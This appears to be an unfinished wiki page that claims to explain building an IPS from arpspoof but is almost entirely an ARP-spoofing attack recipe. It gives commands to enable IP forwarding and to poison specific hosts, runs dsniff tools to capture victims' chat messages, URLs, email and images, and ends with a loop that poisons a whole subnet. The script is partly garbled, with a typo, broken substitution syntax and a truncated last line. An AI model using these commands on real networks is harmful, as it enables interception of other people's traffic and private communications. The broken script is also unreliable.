IPS+from+arpspoof

=How to arpspoof a network and create an IPS=


 * 1) WORK IN PROGRESS #

http://hak5.org/hack/arp-spoofing-with-dsniff

cat /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward

screen arpspoof -t 10.13.37.1 10.13.37.124 arpspoof -t

msgsnarf -i eth0 urlsnart -i eth0 mailsnarf -i eth0

driftnet -i eth0

killall arpspoof


 * arpspoof** [**-i** //interface//] [**-t** //target//] //host//

DESCRIPTION
> **arpspoof**redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch.Kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragrouter(8)) must be turned on ahead of time. 

OPTIONS
> || **-i** //interface// || Specify the interface to use. || > || **-t** //target// || Specify a particular host to ARP poison (if not specified, all hosts on the LAN). || > || //host// || Specify the host you wish to intercept packets for (usually the local gateway). ||


 * 1) !/bin/bash

for ((i=1; i <= 254; i++)) do arpspoof -t 192.168.1.$i $[ifconfig | grep 'inet addr' | sed 's/\:/ /' | sed '/.*127.0.0.1.*/d' | awk '{print $3}'] >